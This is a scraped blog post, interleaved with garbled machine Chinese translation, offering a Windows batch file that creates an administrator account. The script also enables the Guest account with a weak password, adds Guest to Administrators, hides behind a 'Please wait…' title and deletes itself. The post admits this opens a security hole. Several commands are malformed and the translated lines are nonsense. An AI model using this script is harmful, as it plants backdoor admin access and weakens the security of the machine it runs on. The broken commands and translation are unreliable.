Want to convert a user account into an Admin?要转换的一个用户帐户成为政府当局?
Want to convert a user account into an Admin?要转换的一个用户帐户成为政府当局?
All you need to do is copy the code below, copy/paste it into Notepad and save it as User2admin.bat on your desktop.所有您需要做的只是复制代码如下,复制/粘贴到记事本并保存为user2admin.bat您的桌面上。
echo off回声小康
title Please wait…标题请稍候…
cls财利船厂
net user add Username Password /add净用户添加用户名密码/添加
net user localgroup Administrators Username /add净用户localgroup管理员的用户名/添加
net user Guest 420 /active:yes网用户客户420 /主动:是的
net localgroup Guests Guest /DELETE净localgroup客人客户/删除
net localgroup Administrators Guest /add净localgroup管理员客户/添加
del %0删除% 0
Double-click the file to execute or type the above-given code in Command Prompt.双击该文件执行或键入上述代码给出了在命令提示符。
Note: this also creates a net account which is also accessable through nets open port (basically it’sa security leak).注:这也创造了净帐户,这也是可以通过网开放港口(基本上这是安全漏洞) 。
Popularity: 1%人气: 1 %
Written by magakos. 写magakos 。 Read more great feeds at is source 阅读更多伟大的饲料是来源 WEBSITE 网站
no comments 没有评论 . 。
Read more articles on 阅读更多的文章 Scripts 脚本 and 和 WindowS HackS 在Windows的窍门 and 和 All 全部 and 和 otherSoftware othersoftware . 。
- [+] Digg [ + ] digg : Feature this article :特征此文章
- [+] Del.icio.us [ + ] del.icio.us : Bookmark this article :书签此文章
- [+] Furl [ + ] furl : Bookmark this article :书签此文章















